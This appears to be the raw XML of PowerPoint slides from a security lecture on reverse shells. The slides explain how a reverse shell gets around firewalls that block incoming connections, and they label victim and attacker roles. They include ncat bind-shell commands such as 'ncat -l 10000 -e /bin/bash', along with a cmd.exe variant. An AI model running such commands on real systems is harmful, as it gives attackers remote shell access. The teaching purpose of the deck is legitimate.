            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0" smtClean="0"/>
                <a:t>puts </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" dirty="0"/>
                <a:t>input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266129"/>
              <a:ext cx="4764401" cy="1112535"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" xmlns="" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0" smtClean="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7256813" y="2779099"/>
            <a:ext cx="1017874" cy="653136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581185" y="3541811"/>
            <a:ext cx="641739" cy="50612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b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7350303" y="3506829"/>
            <a:ext cx="830894" cy="50612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b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Attacker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for attack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5833" y="1135844"/>
            <a:ext cx="742539" cy="742539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="Straight Arrow Connector 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1170958" y="1507114"/>
            <a:ext cx="2514875" cy="1079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81185" y="1489141"/>
            <a:ext cx="2325165" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to a hidden communication channel (backdoor)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845441" y="1357407"/>
            <a:ext cx="2349732" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication channel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4454981" y="1507114"/>
            <a:ext cx="3084644" cy="1079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43850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4561" y="512749"/>
            <a:ext cx="3362794" cy="828791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64561" y="1443726"/>
            <a:ext cx="3124747" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server listens port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: program to execute after connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>occures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>., connecting STDIN and STDOUT to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: a shell command for Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4877106" y="0"/>
            <a:ext cx="4266894" cy="4795666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233981" y="1443726"/>
            <a:ext cx="643125" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left-Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3526033" y="927144"/>
            <a:ext cx="1263056" cy="15829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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="243402" y="4512942"/>
            <a:ext cx="3506298" cy="282724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="36363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1415" rIns="0" bIns="7141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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>if create a backdoor in Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="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 name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243402" y="153879"/>
            <a:ext cx="1527982" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start listener first</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771384" y="307768"/>
            <a:ext cx="169249" cy="54742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3" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189308" y="94789"/>
            <a:ext cx="1518549" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start Client second</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3948583" y="356399"/>
            <a:ext cx="928523" cy="156350"/>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3183790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Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A new type of backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4852988"/>
            <a:ext cx="549275" cy="290512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ct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2125122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Motivation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Normal backdoor at victim’s PC needs to be activate by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim can setup a firewall to block the income connecting request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for firew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8388" y="3017399"/>
            <a:ext cx="4201191" cy="1646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983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Standard input/output/error</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163380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bypass firewall?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firewall doesn’t block signals sent from victims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let the victim sends the signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let the attacker to listen to the signal</a:t>
            </a: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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="Image result for firew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9312" y="0"/>
            <a:ext cx="3828214" cy="150050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firew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9312" y="3222230"/>
            <a:ext cx="3828214" cy="1500507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5913997" y="3315522"/>
            <a:ext cx="1973525" cy="111833"/>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FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6361981" y="3007745"/>
            <a:ext cx="1269899" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reverse shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6861108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Reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell definition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse shell is getting the connection from the victim or target to your computer</a:t>
            </a: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3430879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Reverse shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="518479" y="2498702"/>
            <a:ext cx="6933259" cy="1280665"/>
            <a:chOff x="1220568" y="5449115"/>
            <a:chExt cx="16789969" cy="3719928"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531580" y="5705018"/>
              <a:ext cx="2210115" cy="111253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2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663240"/>
              <a:ext cx="2233407" cy="1023138"/>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2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400" dirty="0"/>
                <a:t>std output</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 203"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3381619" y="6442023"/>
              <a:ext cx="1083158" cy="438163"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
